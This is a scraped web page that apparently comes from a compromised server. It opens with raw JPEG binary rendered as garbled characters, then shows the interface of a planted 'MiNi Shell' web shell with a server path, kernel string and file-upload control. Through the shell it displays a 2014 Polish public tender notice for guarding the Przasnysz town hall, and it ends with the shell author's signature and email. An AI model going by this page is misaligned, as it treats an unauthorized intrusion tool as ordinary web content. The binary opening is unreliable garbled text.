JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140416/131262-N-2014.html

<p class="kh_header"><b>Przasnysz: Ochrona budynku Urzędu Miasta Przasnysz zlokalizowanego przy ul. J. Kilińskiego 2.</b><br>
<b>Numer ogłoszenia: 131262 - 2014; data zamieszczenia: 16.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Przasnysz , ul. Jana Kilińskiego 2, 06-300 Przasnysz, woj. mazowieckie, tel. 029 7564900, faks 029 7564939.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.przasnysz.um.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona budynku Urzędu Miasta Przasnysz zlokalizowanego przy ul. J. Kilińskiego 2..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest ochrona budynku położonego w Przasnyszu przy ulicy Jana Kilińskiego 2 stanowiącego siedzibę Urzędu Miasta Przasnysz oraz Miejskiej Biblioteki Publicznej w Przasnyszu wraz z obsługą centrum poglądowego monitoringu wizyjnego. Usługa ochrony swoim zakresem obejmuje zarówno ochronę osób przebywających w obiekcie jak i znajdujące się w nim mienie przed włamaniem, kradzieżą, pożarem, zalaniem wodą i innymi zdarzeniami losowymi mogącymi negatywnie wpływać na poziom bezpieczeństwa. Pracownicy ochrony przebywają wewnątrz budynku (stały posterunek) okresowo dokonują obchodu zewnętrznego oraz prowadzą obserwację parkingu będącego własnością Zamawiającego. Pracownicy ochrony muszą być umundurowani. Zgodnie z wymogami Zamawiającego stan etatowy wynosi dwóch pracowników ochrony w dniach od poniedziałku do soboty po jednym na każdej zmianie oraz w niedziele i dni świąteczne jeden pracownik na jedną zmianę. Pracownicy powinni być wyposażeni w paralizator elektryczny, pałki obronne wielofunkcyjne oraz kajdanki. 
Przedmiot zamówienia swoim zakresem obejmuje: 
1) Ochronę fizyczną obiektu w następujących dniach i godzinach: 
- Od poniedziałku do piątku w godzinach od 6:00 do 22:00 
- Sobota w godzinach od 6:00 do 22:00 
- Niedziela w godzinach od 7:00 do 15:00
- Dni świąteczne od 7:00 do 15:00
2) Podłączenie systemu alarmowania do bazy monitoringu Wykonawcy i monitorowanie techniczne sygnałów włamaniowych z budynku. 
3) Czas reakcji patrolu interwencyjnego: W godz. od 6:00 do 22:00 do 10 min w godz. od 22:00 do 6:00 do 5 min. 
4) Obsługę centrum poglądowego monitoringu wizyjnego w następującym zakresie:
a) obsługa urządzeń systemu monitoringu
b) obserwacja i wstępna analiza zdarzeń rejestrowanych przez kamery - 27 szt.
c) współdziałanie z innymi służbami /Policja, Straż Pożarna/ w przekazywaniu informacji o zdarzeniach wymagających interwencji 
d) przestrzeganie zasad ochrony danych osobowych oraz tajemnicy służbowej poprzez niedopuszczenie do przeglądania i rejestrowania zdarzeń ujawnionych przez kamery monitoringu. 
UWAGA! Zamówienie swoim zakresem nie obejmuje ochrony pomieszczenia nr 61 zlokalizowanego na III piętrze budynku, które stanowi magazyn Muzeum Historycznego w Przasnyszu i posiada odrębny system zabezpieczeń.
Zamówienie będzie realizowane zgodnie z prawem polskim, w szczególności z ustawą
ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145 poz. 1221 z późn. zm.), ustawą z dnia 29.1.2004 Prawo zamówień publicznych  t. j. Dz.U.2013 poz. 907 ze zm.) i ustawą Kodeks cywilny (Dz. U. Nr 16 poz. 93 ze zm.)  oraz aktami wykonawczymi do tych ustaw.  
Podwykonawstwo :
1.	Zamawiający wymaga wskazania w ofercie  części  zamówienia, których wykonanie Wykonawca powierzy podwykonawcom. Brak takiego wskazania Zamawiający potraktuje jako deklarację wykonania całego zamówienia osobiście przez Wykonawcę.   
2.	Jeżeli  w realizacji zamówienia będą brały udział podmioty trzecie (podwykonawcy), na których potencjał Wykonawca powołał się w celu wykazania spełnienia warunków udziału w przetargu,  w odniesieniu do tych podmiotów  Wykonawca zobowiązany jest załączyć do oferty dokumenty potwierdzające brak podstaw do wykluczenia ich z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy pzp. 
3.	W przypadku, gdy wykonawca powołuje się - na zasadach określonych w art. 26 ust. 2b ustawy pzp - w celu wykazania spełniania warunków udziału w postępowaniu - na zasoby innych podmiotów (podwykonawców), którzy będą realizować część zamówienia, zobowiązany jest podać w ofercie także nazwy tych podmiotów.
4.	 Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się- na zasadach określonych w art. 26 ust. 2b ustawy pzp - w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest zobowiązany udowodnić zamawiającemu, że inny proponowany podwykonawca, lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż wymagany w trakcie postępowania.
5.	Powierzenie wykonania części zamówienia podwykonawcy może nastąpić wyłącznie na podstawie Umowy Podwykonawstwa.
6.	Przez Umowę Podwykonawstwa rozumie się umowę w formie pisemnej o charakterze odpłatnym, której przedmiotem są usługi stanowiące część niniejszego zamówienia, zawartą między wybranym przez zamawiającego wykonawcą a podwykonawcą. 
7.	Protokół odbioru zadania (częściowy/ końcowy) podpisany przez zamawiającego i wykonawcę jest wystarczającym dowodem potwierdzającym wykonanie usług i uprawniającym podwykonawcę do wystawienia faktury za wykonanie zleconej podwykonawcy usługi lub dostawy. Umowa podwykonawstwa nie może zawierać postanowień odmiennych w zakresie zasad odbiorów niż określone w umowie podstawowej.
8.	Pozostałe zasady w zakresie podwykonawstwa regulują postanowienia umowy zawarte w SIWZ Rozdz. III.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 Prawa zamówień publicznych o wartość zamówień do 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca posiadał Koncesję Ministra Spraw Wewnętrznych i Administracji zezwalającą na prowadzenie usług w zakresie ochrony osób i mienia, o której mowa w art. 15 ust. 1 ustawy o ochronie osób i mienia (Dz. U. z 2005 r.  Nr 145, poz. 1221 z późn. zm.)
Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy pzp (Formularz nr 2) stanowiący załącznik do SIWZ oraz potwierdzonej za zgodność z oryginałem kserokopii Koncesji Ministra Spraw Wewnętrznych i Administracji załączonej do oferty przetargowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca wykazał że w okresie 3 lat poprzedzających datę składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie świadczył 2 usługi w zakresie ochrony osób i mienia o wartości 120.000,00 zł brutto każda. 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy  pzp  oraz  wykazu zadań na Formularzu 4, zawierającego  zadania  odpowiadające  wymaganiom Zamawiającego przedstawionym w  SIWZ 
Łącznie należy interpretować w ten  sposób, że każdy z wykonawców  może wykazać się realizacją wymaganych zadań, a wykazanie się tą umiejętnością przez jednego z wykonawców zwalnia pozostałych z tego obowiązku. Sformułowania łącznie nie należy utożsamiać z sumowaniem  wartości drobnych zamówień nie przekraczających minimalnego  progu określonego w opisie warunku  
W przypadku kontraktów zawartych w walutach innych niż PLN, należy ich wartość  przeliczyć na PLN wg średniego kursu NBP z dnia podpisania kontraktu, podając datę podpisania umowy i kurs waluty. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W przypadku, gdy Wykonawca wykazując spełnianie warunku polega na wiedzy i doświadczeniu innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca posiadał bazę monitoringu antywłamaniowego do którego możliwe będzie podłączenie systemy alarmowego Zamawiającego.
Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy pzp (Formularz nr 2) stanowiący załącznik do SIWZ
Wykonawca może polegać na potencjale technicznym do wykonania zamówienia  innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków  na zasadach określonych w art. 26 ust. 2b ustawy Pzp. W przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na potencjale technicznym do wykonania zamówienia  innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował  tymi potencjałem, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób na okres udziału w wykonywaniu zamówienia, zawierające.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponował osobami - niezależnie od charakteru prawnego łączących go z nimi stosunków - legitymującymi się doświadczeniem zawodowym oraz licencją I lub II stopnia pracownika ochrony.
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych. 
UWAGA! Zamawiający przed podpisaniem umowy zażąda od Wykonawcy wykazu personelu skierowanego do wykonywania przedmiotu zamówienia wraz z dokumentami potwierdzającymi posiadanie kwalifikacji wskazanych osób do pełnienia powierzonych im obowiązków. 
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia powyższy warunek spełniają łącznie. 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia  innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków  na zasadach określonych w art. 26 ust. 2b ustawy Pzp. W przypadku gdy Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na osobach zdolnych do wykonania zamówienia  innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował  tymi osobami, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające także listę osób, które zostaną przez ten podmiot udostępnione.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. 
Zamawiający dokona oceny spełnienia tego warunku na podstawie oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy pzp (Formularz nr 2) stanowiący załącznik do SIWZ
Ocena spełnienia warunków uczestnictwa w przetargu będzie dokonana w formule  (spełnia / nie spełnia ) na podstawie dokumentów wymienionych w punkcie 9 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą. Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy. Warunki wprowadzenia zmian są następujące: 
1)	zmiana wynagrodzenia
a)	 w przypadku zmiany stawki podatku VAT w okresie realizacji zamówienia - dotyczy  tej części wynagrodzenia za usługę, której  nie zafakturowano  na dzień wejścia w życie przepisów o zmianie stawki VAT.
2)	Inne zmiany: 
a)	Zmiany zakresu podwykonawstwa poprzez:
-Wskazanie innych podwykonawców
-Rezygnację podwykonawców
-Wskazanie innego zakresu podwykonawstwa albo wykonanie zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa, 
b)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b, w celu wskazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 i SIWZ, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenia zamówienia
c)	zmian osób reprezentujących, pod warunkiem wcześniejszego powiadomienia i akceptacji drugiej strony, w następujących przypadkach: śmierci, choroby lub innych zdarzeń losowych,
jeżeli zmiana stanie sie konieczna z jakichkolwiek innych przyczyn niezależnych od Zamawiającego lub Wykonawcy ( np. rezygnacji. itp.),
d)	zmiana danych teleadresowych stron umowy.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.przasnysz.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Przasnysz ul. J. Kilińskiego 2 06-300 Przasnysz...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 12:00, miejsce: Urząd Miasta Przasnysz Biuro Obsługi Interesanta ul. J. Kilińskiego 2 06-300 Przasnysz..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nie jest finansowany ze środków Unii Europejskiej. Nie przewiduje się zwrotu kosztów udziału w postępowaniu z zastrzeżeniem art. 93 ust. 4..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com